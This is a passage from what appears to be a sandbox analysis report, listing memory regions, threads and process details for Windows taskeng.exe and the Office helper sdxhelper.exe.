SERVICE\\wlidsvc" [0xa], "NT SERVICE\\wuauserv" [0xe], "NT SERVICE\\XboxNetApiSvc" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000b5ca" [0xc0000007], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Region: id = 6541 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 6542 start_va = 0x86f7010000 end_va = 0x86f702ffff entry_point = 0x0 region_type = private name = "private_0x00000086f7010000" filename = "" Region: id = 6543 start_va = 0x86f7030000 end_va = 0x86f7043fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000086f7030000" filename = "" Region: id = 6544 start_va = 0x86f7050000 end_va = 0x86f70cffff entry_point = 0x0 region_type = private name = "private_0x00000086f7050000" filename = "" Region: id = 6545 start_va = 0x86f70d0000 end_va = 0x86f70d3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000086f70d0000" filename = "" Region: id = 6546 start_va = 0x86f70e0000 end_va = 0x86f70e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000086f70e0000" filename = "" Region: id = 6547 start_va = 0x86f70f0000 end_va = 0x86f70f1fff entry_point = 0x0 region_type = private name = "private_0x00000086f70f0000" filename = "" Region: id = 6548 start_va = 0x7df5ff9d0000 end_va = 0x7ff5ff9cffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ff9d0000" filename = "" Region: id = 6549 start_va = 0x7ff7c49a0000 end_va = 0x7ff7c49c2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff7c49a0000" filename = "" Region: id = 6550 start_va = 0x7ff7c49c7000 end_va = 0x7ff7c49c7fff entry_point = 0x0 region_type = private name = "private_0x00007ff7c49c7000" filename = "" Region: id = 6551 start_va = 0x7ff7c49ce000 end_va = 0x7ff7c49cffff entry_point = 0x0 region_type = private name = "private_0x00007ff7c49ce000" filename = "" Region: id = 6552 start_va = 0x7ff7c58b0000 end_va = 0x7ff7c58fcfff entry_point = 0x7ff7c58b0000 region_type = mapped_file name = "taskeng.exe" filename = "\\Windows\\System32\\taskeng.exe" (normalized: "c:\\windows\\system32\\taskeng.exe") Region: id = 6553 start_va = 0x7ffc57b50000 end_va = 0x7ffc57d11fff entry_point = 0x7ffc57b50000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 6554 start_va = 0x86f7210000 end_va = 0x86f730ffff entry_point = 0x0 region_type = private name = "private_0x00000086f7210000" filename = "" Region: id = 6555 start_va = 0x7ffc55040000 end_va = 0x7ffc5521cfff entry_point = 0x7ffc55040000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 6556 start_va = 0x7ffc55800000 end_va = 0x7ffc558acfff entry_point = 0x7ffc55800000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 6557 start_va = 0x86f7010000 end_va = 0x86f701ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000086f7010000" filename = "" Region: id = 6558 start_va = 0x86f7020000 end_va = 0x86f7026fff entry_point = 0x0 region_type = private name = "private_0x00000086f7020000" filename = "" Region: id = 6559 start_va = 0x86f7100000 end_va = 0x86f71bdfff entry_point = 0x86f7100000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 6560 start_va = 0x86f71c0000 end_va = 0x86f71c6fff entry_point = 0x0 region_type = private name = "private_0x00000086f71c0000" filename = "" Region: id = 6561 start_va = 0x86f71d0000 end_va = 0x86f71d0fff entry_point = 0x86f71d0000 region_type = mapped_file name = "taskeng.exe.mui" filename = "\\Windows\\System32\\en-US\\TaskEng.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\taskeng.exe.mui") Region: id = 6562 start_va = 0x86f71e0000 end_va = 0x86f71e0fff entry_point = 0x0 region_type = private name = "private_0x00000086f71e0000" filename = "" Region: id = 6563 start_va = 0x86f71f0000 end_va = 0x86f71f0fff entry_point = 0x0 region_type = private name = "private_0x00000086f71f0000" filename = "" Region: id = 6564 start_va = 0x86f7310000 end_va = 0x86f738ffff entry_point = 0x0 region_type = private name = "private_0x00000086f7310000" filename = "" Region: id = 6565 start_va = 0x86f7390000 end_va = 0x86f744ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000086f7390000" filename = "" Region: id = 6566 start_va = 0x86f7480000 end_va = 0x86f748ffff entry_point = 0x0 region_type = private name = "private_0x00000086f7480000" filename = "" Region: id = 6567 start_va = 0x86f7590000 end_va = 0x86f759ffff entry_point = 0x0 region_type = private name = "private_0x00000086f7590000" filename = "" Region: id = 6568 start_va = 0x86f75a0000 end_va = 0x86f7727fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000086f75a0000" filename = "" Region: id = 6569 start_va = 0x86f7730000 end_va = 0x86f78b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000086f7730000" filename = "" Region: id = 6570 start_va = 0x7ff7c48a0000 end_va = 0x7ff7c499ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff7c48a0000" filename = "" Region: id = 6571 start_va = 0x7ff7c49cc000 end_va = 0x7ff7c49cdfff entry_point = 0x0 region_type = private name = "private_0x00007ff7c49cc000" filename = "" Region: id = 6572 start_va = 0x7ffc543a0000 end_va = 0x7ffc543c7fff entry_point = 0x7ffc543a0000 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\System32\\bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll") Region: id = 6573 start_va = 0x7ffc543d0000 end_va = 0x7ffc5443afff entry_point = 0x7ffc543d0000 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\System32\\bcryptprimitives.dll" (normalized: "c:\\windows\\system32\\bcryptprimitives.dll") Region: id = 6574 start_va = 0x7ffc54610000 end_va = 0x7ffc5461efff entry_point = 0x7ffc54610000 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll") Region: id = 6575 start_va = 0x7ffc552c0000 end_va = 0x7ffc5535cfff entry_point = 0x7ffc552c0000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 6576 start_va = 0x7ffc554e0000 end_va = 0x7ffc5562dfff entry_point = 0x7ffc554e0000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 6577 start_va = 0x7ffc55910000 end_va = 0x7ffc559cdfff entry_point = 0x7ffc55910000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 6578 start_va = 0x7ffc56f10000 end_va = 0x7ffc57094fff entry_point = 0x7ffc56f10000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 6579 start_va = 0x7ffc570a0000 end_va = 0x7ffc571c5fff entry_point = 0x7ffc570a0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 6580 start_va = 0x7ffc571d0000 end_va = 0x7ffc5744bfff entry_point = 0x7ffc571d0000 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 6581 start_va = 0x7ffc57540000 end_va = 0x7ffc5759afff entry_point = 0x7ffc57540000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 6582 start_va = 0x7ffc57aa0000 end_va = 0x7ffc57b45fff entry_point = 0x7ffc57aa0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 6583 start_va = 0x86f7490000 end_va = 0x86f750ffff entry_point = 0x0 region_type = private name = "private_0x00000086f7490000" filename = "" Region: id = 6584 start_va = 0x7ff7c49ca000 end_va = 0x7ff7c49cbfff entry_point = 0x0 region_type = private name = "private_0x00007ff7c49ca000" filename = "" Region: id = 6585 start_va = 0x7ffc54320000 end_va = 0x7ffc5434bfff entry_point = 0x7ffc54320000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll") Region: id = 6586 start_va = 0x86f7200000 end_va = 0x86f7200fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000086f7200000" filename = "" Region: id = 6587 start_va = 0x86f7510000 end_va = 0x86f758ffff entry_point = 0x0 region_type = private name = "private_0x00000086f7510000" filename = "" Region: id = 6588 start_va = 0x86f78c0000 end_va = 0x86f79bffff entry_point = 0x0 region_type = private name = "private_0x00000086f78c0000" filename = "" Region: id = 6589 start_va = 0x86f79c0000 end_va = 0x86f7cf6fff entry_point = 0x86f79c0000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 6590 start_va = 0x86f7d00000 end_va = 0x86f7d7ffff entry_point = 0x0 region_type = private name = "private_0x00000086f7d00000" filename = "" Region: id = 6591 start_va = 0x86f7d80000 end_va = 0x86f7dfffff entry_point = 0x0 region_type = private name = "private_0x00000086f7d80000" filename = "" Region: id = 6592 start_va = 0x7ff7c49c3000 end_va = 0x7ff7c49c4fff entry_point = 0x0 region_type = private name = "private_0x00007ff7c49c3000" filename = "" Region: id = 6593 start_va = 0x7ff7c49c5000 end_va = 0x7ff7c49c6fff entry_point = 0x0 region_type = private name = "private_0x00007ff7c49c5000" filename = "" Region: id = 6594 start_va = 0x7ff7c49c8000 end_va = 0x7ff7c49c9fff entry_point = 0x0 region_type = private name = "private_0x00007ff7c49c8000" filename = "" Region: id = 6595 start_va = 0x7ffc51a40000 end_va = 0x7ffc51a48fff entry_point = 0x7ffc51a40000 region_type = mapped_file name = "tschannel.dll" filename = "\\Windows\\System32\\TSChannel.dll" (normalized: "c:\\windows\\system32\\tschannel.dll") Region: id = 6596 start_va = 0x7ffc53a90000 end_va = 0x7ffc53ac2fff entry_point = 0x7ffc53a90000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 6597 start_va = 0x7ffc54210000 end_va = 0x7ffc54226fff entry_point = 0x7ffc54210000 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 6598 start_va = 0x7ffc54280000 end_va = 0x7ffc5428afff entry_point = 0x7ffc54280000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 6599 start_va = 0x7ffc57970000 end_va = 0x7ffc57a14fff entry_point = 0x7ffc57970000 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 6600 start_va = 0x86f7450000 end_va = 0x86f7456fff entry_point = 0x0 region_type = private name = "private_0x00000086f7450000" filename = "" Region: id = 6601 start_va = 0x86f7e00000 end_va = 0x86f7e7ffff entry_point = 0x0 region_type = private name = "private_0x00000086f7e00000" filename = "" Region: id = 6602 start_va = 0x7ff7c489e000 end_va = 0x7ff7c489ffff entry_point = 0x0 region_type = private name = "private_0x00007ff7c489e000" filename = "" Region: id = 6603 start_va = 0x7ffc4fb00000 end_va = 0x7ffc4fb35fff entry_point = 0x7ffc4fb00000 region_type = mapped_file name = "xmllite.dll" filename = "\\Windows\\System32\\xmllite.dll" (normalized: "c:\\windows\\system32\\xmllite.dll") Thread: id = 121 os_tid = 0xe2c Thread: id = 122 os_tid = 0x5bc Thread: id = 123 os_tid = 0xe28 Thread: id = 124 os_tid = 0xe18 Thread: id = 125 os_tid = 0xe20 Thread: id = 126 os_tid = 0xe24 Thread: id = 134 os_tid = 0xe34 Thread: id = 135 os_tid = 0xe1c Process: id = "9" image_name = "taskeng.exe" filename = "c:\\windows\\system32\\taskeng.exe" page_root = "0x364d4000" os_pid = "0xd98" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "4" os_parent_pid = "0x324" cmd_line = "taskeng.exe {A121A3E1-71EA-4CE2-B467-D9432D8A3FF7} S-1-5-21-1462094071-1423818996-289466292-1000:LHNIWSJ\\CIiHmnxMn6Ps:Interactive:LUA[1]" cur_dir = "C:\\Windows\\system32\\" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:00013da5" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 6604 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 6605 start_va = 0x9b4e440000 end_va = 0x9b4e45ffff entry_point = 0x0 region_type = private name = "private_0x0000009b4e440000" filename = "" Region: id = 6606 start_va = 0x9b4e460000 end_va = 0x9b4e473fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000009b4e460000" filename = "" Region: id = 6607 start_va = 0x9b4e480000 end_va = 0x9b4e4fffff entry_point = 0x0 region_type = private name = "private_0x0000009b4e480000" filename = "" Region: id = 6608 start_va = 0x9b4e500000 end_va = 0x9b4e503fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000009b4e500000" filename = "" Region: id = 6609 start_va = 0x9b4e510000 end_va = 0x9b4e510fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000009b4e510000" filename = "" Region: id = 6610 start_va = 0x9b4e520000 end_va = 0x9b4e521fff entry_point = 0x0 region_type = private name = "private_0x0000009b4e520000" filename = "" Region: id = 6611 start_va = 0x7df5ff2d0000 end_va = 0x7ff5ff2cffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ff2d0000" filename = "" Region: id = 6612 start_va = 0x7ff7c51a0000 end_va = 0x7ff7c51c2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff7c51a0000" filename = "" Region: id = 6613 start_va = 0x7ff7c51c5000 end_va = 0x7ff7c51c5fff entry_point = 0x0 region_type = private name = "private_0x00007ff7c51c5000" filename = "" Region: id = 6614 start_va = 0x7ff7c51ce000 end_va = 0x7ff7c51cffff entry_point = 0x0 region_type = private name = "private_0x00007ff7c51ce000" filename = "" Region: id = 6615 start_va = 0x7ff7c58b0000 end_va = 0x7ff7c58fcfff entry_point = 0x7ff7c58b0000 region_type = mapped_file name = "taskeng.exe" filename = "\\Windows\\System32\\taskeng.exe" (normalized: "c:\\windows\\system32\\taskeng.exe") Region: id = 6616 start_va = 0x7ffc57b50000 end_va = 0x7ffc57d11fff entry_point = 0x7ffc57b50000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 6617 start_va = 0x9b4e440000 end_va = 0x9b4e44ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000009b4e440000" filename = "" Region: id = 6618 start_va = 0x9b4e450000 end_va = 0x9b4e456fff entry_point = 0x0 region_type = private name = "private_0x0000009b4e450000" filename = "" Region: id = 6619 start_va = 0x9b4e530000 end_va = 0x9b4e5edfff entry_point = 0x9b4e530000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 6620 start_va = 0x9b4e5f0000 end_va = 0x9b4e66ffff entry_point = 0x0 region_type = private name = "private_0x0000009b4e5f0000" filename = "" Region: id = 6621 start_va = 0x9b4e670000 end_va = 0x9b4e676fff entry_point = 0x0 region_type = private name = "private_0x0000009b4e670000" filename = "" Region: id = 6622 start_va = 0x9b4e6b0000 end_va = 0x9b4e7affff entry_point = 0x0 region_type = private name = "private_0x0000009b4e6b0000" filename = "" Region: id = 6623 start_va = 0x9b4e810000 end_va = 0x9b4e81ffff entry_point = 0x0 region_type = private name = "private_0x0000009b4e810000" filename = "" Region: id = 6624 start_va = 0x9b4e820000 end_va = 0x9b4e89ffff entry_point = 0x0 region_type = private name = "private_0x0000009b4e820000" filename = "" Region: id = 6625 start_va = 0x9b4e8a0000 end_va = 0x9b4e91ffff entry_point = 0x0 region_type = private name = "private_0x0000009b4e8a0000" filename = "" Region: id = 6626 start_va = 0x9b4e940000 end_va = 0x9b4e94ffff entry_point = 0x0 region_type = private name = "private_0x0000009b4e940000" filename = "" Region: id = 6627 start_va = 0x9b4e950000 end_va = 0x9b4ea4ffff entry_point = 0x0 region_type = private name = "private_0x0000009b4e950000" filename = "" Region: id = 6628 start_va = 0x9b4ea50000 end_va = 0x9b4ed86fff entry_point = 0x9b4ea50000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 6629 start_va = 0x7ff7c50a0000 end_va = 0x7ff7c519ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff7c50a0000" filename = "" Region: id = 6630 start_va = 0x7ff7c51c8000 end_va = 0x7ff7c51c9fff entry_point = 0x0 region_type = private name = "private_0x00007ff7c51c8000" filename = "" Region: id = 6631 start_va = 0x7ff7c51ca000 end_va = 0x7ff7c51cbfff entry_point = 0x0 region_type = private name = "private_0x00007ff7c51ca000" filename = "" Region: id = 6632 start_va = 0x7ff7c51cc000 end_va = 0x7ff7c51cdfff entry_point = 0x0 region_type = private name = "private_0x00007ff7c51cc000" filename = "" Region: id = 6633 start_va = 0x7ffc53a90000 end_va = 0x7ffc53ac2fff entry_point = 0x7ffc53a90000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 6634 start_va = 0x7ffc54210000 end_va = 0x7ffc54226fff entry_point = 0x7ffc54210000 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 6635 start_va = 0x7ffc54280000 end_va = 0x7ffc5428afff entry_point = 0x7ffc54280000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 6636 start_va = 0x7ffc54320000 end_va = 0x7ffc5434bfff entry_point = 0x7ffc54320000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll") Region: id = 6637 start_va = 0x7ffc543a0000 end_va = 0x7ffc543c7fff entry_point = 0x7ffc543a0000 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\System32\\bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll") Region: id = 6638 start_va = 0x7ffc543d0000 end_va = 0x7ffc5443afff entry_point = 0x7ffc543d0000 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\System32\\bcryptprimitives.dll" (normalized: "c:\\windows\\system32\\bcryptprimitives.dll") Region: id = 6639 start_va = 0x7ffc54610000 end_va = 0x7ffc5461efff entry_point = 0x7ffc54610000 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll") Region: id = 6640 start_va = 0x7ffc55040000 end_va = 0x7ffc5521cfff entry_point = 0x7ffc55040000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 6641 start_va = 0x7ffc552c0000 end_va = 0x7ffc5535cfff entry_point = 0x7ffc552c0000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 6642 start_va = 0x7ffc55800000 end_va = 0x7ffc558acfff entry_point = 0x7ffc55800000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 6643 start_va = 0x7ffc55910000 end_va = 0x7ffc559cdfff entry_point = 0x7ffc55910000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 6644 start_va = 0x7ffc570a0000 end_va = 0x7ffc571c5fff entry_point = 0x7ffc570a0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 6645 start_va = 0x7ffc571d0000 end_va = 0x7ffc5744bfff entry_point = 0x7ffc571d0000 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 6646 start_va = 0x7ffc57540000 end_va = 0x7ffc5759afff entry_point = 0x7ffc57540000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 6647 start_va = 0x7ffc57aa0000 end_va = 0x7ffc57b45fff entry_point = 0x7ffc57aa0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 6648 start_va = 0x9b4e680000 end_va = 0x9b4e680fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000009b4e680000" filename = "" Region: id = 6649 start_va = 0x9b4e690000 end_va = 0x9b4e690fff entry_point = 0x9b4e690000 region_type = mapped_file name = "taskeng.exe.mui" filename = "\\Windows\\System32\\en-US\\TaskEng.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\taskeng.exe.mui") Region: id = 6650 start_va = 0x9b4e6a0000 end_va = 0x9b4e6a0fff entry_point = 0x0 region_type = private name = "private_0x0000009b4e6a0000" filename = "" Region: id = 6651 start_va = 0x9b4e7b0000 end_va = 0x9b4e7b0fff entry_point = 0x0 region_type = private name = "private_0x0000009b4e7b0000" filename = "" Region: id = 6652 start_va = 0x9b4e7c0000 end_va = 0x9b4e7c6fff entry_point = 0x0 region_type = private name = "private_0x0000009b4e7c0000" filename = "" Region: id = 6653 start_va = 0x9b4ed90000 end_va = 0x9b4ee0ffff entry_point = 0x0 region_type = private name = "private_0x0000009b4ed90000" filename = "" Region: id = 6654 start_va = 0x9b4ee10000 end_va = 0x9b4ee8ffff entry_point = 0x0 region_type = private name = "private_0x0000009b4ee10000" filename = "" Region: id = 6655 start_va = 0x9b4ee90000 end_va = 0x9b4f017fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000009b4ee90000" filename = "" Region: id = 6656 start_va = 0x9b4f020000 end_va = 0x9b4f1a0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000009b4f020000" filename = "" Region: id = 6657 start_va = 0x9b4f1b0000 end_va = 0x9b505affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000009b4f1b0000" filename = "" Region: id = 6658 start_va = 0x7ff7c51c3000 end_va = 0x7ff7c51c4fff entry_point = 0x0 region_type = private name = "private_0x00007ff7c51c3000" filename = "" Region: id = 6659 start_va = 0x7ff7c51c6000 end_va = 0x7ff7c51c7fff entry_point = 0x0 region_type = private name = "private_0x00007ff7c51c6000" filename = "" Region: id = 6660 start_va = 0x7ffc51a40000 end_va = 0x7ffc51a48fff entry_point = 0x7ffc51a40000 region_type = mapped_file name = "tschannel.dll" filename = "\\Windows\\System32\\TSChannel.dll" (normalized: "c:\\windows\\system32\\tschannel.dll") Region: id = 6661 start_va = 0x7ffc55280000 end_va = 0x7ffc552b5fff entry_point = 0x7ffc55280000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 6662 start_va = 0x7ffc55380000 end_va = 0x7ffc554dbfff entry_point = 0x7ffc55380000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 6663 start_va = 0x7ffc554e0000 end_va = 0x7ffc5562dfff entry_point = 0x7ffc554e0000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 6664 start_va = 0x7ffc56f10000 end_va = 0x7ffc57094fff entry_point = 0x7ffc56f10000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 6665 start_va = 0x7ffc57970000 end_va = 0x7ffc57a14fff entry_point = 0x7ffc57970000 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 6666 start_va = 0x9b4e7d0000 end_va = 0x9b4e7dffff entry_point = 0x0 region_type = private name = "private_0x0000009b4e7d0000" filename = "" Region: id = 6667 start_va = 0x9b505b0000 end_va = 0x9b5062ffff entry_point = 0x0 region_type = private name = "private_0x0000009b505b0000" filename = "" Region: id = 6668 start_va = 0x7ff7c509e000 end_va = 0x7ff7c509ffff entry_point = 0x0 region_type = private name = "private_0x00007ff7c509e000" filename = "" Region: id = 6669 start_va = 0x7ffc4fb00000 end_va = 0x7ffc4fb35fff entry_point = 0x7ffc4fb00000 region_type = mapped_file name = "xmllite.dll" filename = "\\Windows\\System32\\xmllite.dll" (normalized: "c:\\windows\\system32\\xmllite.dll") Region: id = 6670 start_va = 0x7ffc52d70000 end_va = 0x7ffc52e05fff entry_point = 0x7ffc52d70000 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll") Region: id = 6671 start_va = 0x9b4e7e0000 end_va = 0x9b4e7e3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000009b4e7e0000" filename = "" Region: id = 6672 start_va = 0x9b50630000 end_va = 0x9b506e7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000009b50630000" filename = "" Region: id = 6673 start_va = 0x7ffc525f0000 end_va = 0x7ffc52611fff entry_point = 0x7ffc525f0000 region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\System32\\dwmapi.dll" (normalized: "c:\\windows\\system32\\dwmapi.dll") Region: id = 6674 start_va = 0x7ffc52cd0000 end_va = 0x7ffc52d47fff entry_point = 0x7ffc52cd0000 region_type = mapped_file name = "apphelp.dll" filename = "\\Windows\\System32\\apphelp.dll" (normalized: "c:\\windows\\system32\\apphelp.dll") Thread: id = 127 os_tid = 0xe50 Thread: id = 128 os_tid = 0xe4c Thread: id = 129 os_tid = 0xe3c Thread: id = 130 os_tid = 0xe44 Thread: id = 131 os_tid = 0xe48 Thread: id = 132 os_tid = 0xe58 Thread: id = 133 os_tid = 0xe40 Process: id = "10" image_name = "sdxhelper.exe" filename = "c:\\program files\\microsoft office\\root\\vfs\\programfilescommonx64\\microsoft shared\\office16\\sdxhelper.exe" page_root = "0x74029000" os_pid = "0xea0" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xd98" cmd_line = "\"C:\\Program Files\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX64\\Microsoft Shared\\Office16\\sdxhelper.exe\" /onlogon" cur_dir = "C:\\Windows\\system32\\" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:00013da5" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 6678 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 6679 start_va = 0x3688a00000 end_va = 0x3688a1ffff entry_point = 0x0 region_type = private name = "private_0x0000003688a00000" filename = "" Region: id = 6680 start_va = 0x3688a20000 end_va = 0x3688a33fff entry_point = 0x0 region_type = 